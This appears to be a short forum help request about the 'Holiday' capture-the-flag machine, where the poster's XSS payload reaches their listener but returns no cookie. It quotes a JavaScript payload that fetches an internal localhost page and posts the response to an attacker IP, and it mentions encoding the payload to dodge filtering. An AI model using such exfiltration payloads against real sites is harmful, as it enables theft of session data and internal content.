Holiday acting strange ---Saw ippsec video already.

I am on the page where i need to use an xss payload to get a cookie. Now i can get a request to my local pythonserver or nc - 80 open port . I just dont see the cookie on it.

Using this as payload

var url = “http://localhost:8000/vac/5a8a26f1-b883-4313-b126-109889498a8a”; $.ajax({ method: “GET”,url: url,success: function(data) { $.post(“http://10.10.14.X:4567”, data);}});

Using a python encoder to encode the payload to decimal code.